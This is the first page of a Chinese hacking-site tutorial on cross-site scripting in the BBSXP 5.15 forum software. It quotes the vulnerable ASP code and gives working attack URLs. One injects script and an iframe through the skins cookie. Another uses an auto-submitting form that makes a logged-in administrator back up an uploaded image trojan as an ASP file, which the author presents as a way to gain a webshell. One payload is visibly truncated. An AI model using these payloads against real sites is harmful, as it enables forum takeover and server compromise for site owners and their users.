简单分析Script脚本跨站攻击漏洞技术

• 　　所谓跨站漏洞呢？其实这和现在比较热门的SQL注入的原理有异曲同工之处，都是由于程序员在写程序的时候对一些变量没有做充分的过滤，或者没做任何的过滤就直接把用户提交的数据送到SQL语句里执行，这样导致了用户

  　　所提交的一些特意构造的语句 一般都是带有象JAVAScript等这类脚本代码，这样在服务里一旦被执行就形成了所谓的跨站攻击了。一般来说对于人机交互行比较高的程序，比如论坛，留言版这类程序都比较容易存在跨站script攻击。

  　　 如何判断一个程序是否存在跨站漏洞呢？分析程序是最直接的方法了，比如最近搞的很火的BBSXP5.15的跨站

  　　漏洞，因为有大虾已经详细的介绍了，偶也就不在详述了，简单的说一下在cookies.asp文件里有这么一句

  　　Response.Cookies("skins")=""&Request("no")&""然后在setup.asp里

  　　response.write "<html><head><meta http-equiv=Content-Type content=text/html;charset=gb2312></head>
  <link href=images/skins/"&Request.Cookies("skins")&"/bbs.css rel=stylesheet><script src=inc/BBSxp.js></script>
  <script src=inc/ybb.js></script><script src=images/skins/"&Request.Cookies("skins")&"/bbs.js></script>" 

  　　我们可以看到，只要构造符合条件的skin的NO，然后在闭合前面的一个"<"接着就可以在后面加上我们的<script脚本了

  　　比如：  http://xxx.xxxx.xxx/cookies.asp?menu=skins&no=4><script>document.write(’<IFRAME marginWidth=100 marginHeight=100 src="http://www.baidu.com"frameBorder=100width=0scrolling=noheight=0to ... gin="0"></IFRAME>’);</script><script>   

  　　这样提交就可以达到我们的跨站目的了，（这个我动画里已经有演示了）

  　　而跟深一层的利用，我们则可以构造表单，迷惑管理员点我们的帖子，或者联接。比如我们构造

  　　http://127.0.0.1/bbsxp/page2.asp?username=<body onload="javascript:document.forms[0].submit()">

  　　<form action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post">
  <input value="http://soft.yesky.com/UploadFile/2005-5/200512365.jpg" name="yl" >
  <input value="database/haha.asp" name="bf" >
  </body></html>
  /UploadFile/2005-5/200512365.jpg
  这是你的ASP图片木马

  　　这样我们就如果让管理员浏览了我们的留言，那么这个脚本就会自动把/UploadFile/2005-5/200512365.jpg

  　　备份成database/haha.asp。我们也就有了可爱的webshell了。而为什么要管理员浏览才有效呢？因为服务器上是存在cookies和session机制的

  　　而session其实是在服务器端的tmp目录下的某一个文件中为每个用户储存一些变量，对session的操作其实是对文件读写操作。

  　　seesion是每个用户都有自己的session。他们的生命周期一般是用户打开某网站浏览器到关闭与次网站连接所

  　　有的浏览器后结束。cookie这是在用户端的存贮机制，他需要用户的打开cookie支持，所以只有管理才有权利把我们JPG备份在ASP 
  

• [1] [2] [3] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 简单分析Script脚本跨站攻击漏洞技术 相关文章：
• ·Vista精简工具vLite 1.1RC版下载
• ·简易边框制作Photoshop教程
• ·“中文.COM”因繁简不等效再陷纠纷
• ·简单分析2007年11月十大网络安全漏洞
• ·简单分析Script脚本跨站攻击漏洞技术
• ·XP系统精简工具nLite 1.4.1正式版
• ·保护隐私 实现网络监控的简单方法
• ·Windows Vista SP1 RC简体中文版官方下载
• ·简单七步最大限度优化你的博客文章
• ·CorelDRAW绘简笔卡通动物青蛙
• 简单分析Script脚本跨站攻击漏洞技术 相关软件
• ·《冰封王座》地图:宝石TD v3.1 简繁
• ·《冰封王座》地图：真三国无双v4.3C2 简繁
• ·象棋巫师 简体版
• ·凯撒大帝4－简体中文汉化包V0.8版
• ·NDS《逆转裁判4 完美汉化简体中文版》模拟器
• ·《魔兽争霸》1.21简体中文补丁下载
• ·《恶魔城》皮鞭与蜡烛简易试玩
• ·《生化危机4》完整字幕简易安装包
• ·《泡泡游戏大厅》精简版
• ·NDS《迷失蔚蓝2》简体中文汉化版模拟器

上一篇:Windows Vista系统美化之DLL手术终极宝典

下一篇:XP SP3 RC1官方下载地址(附验证码)

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐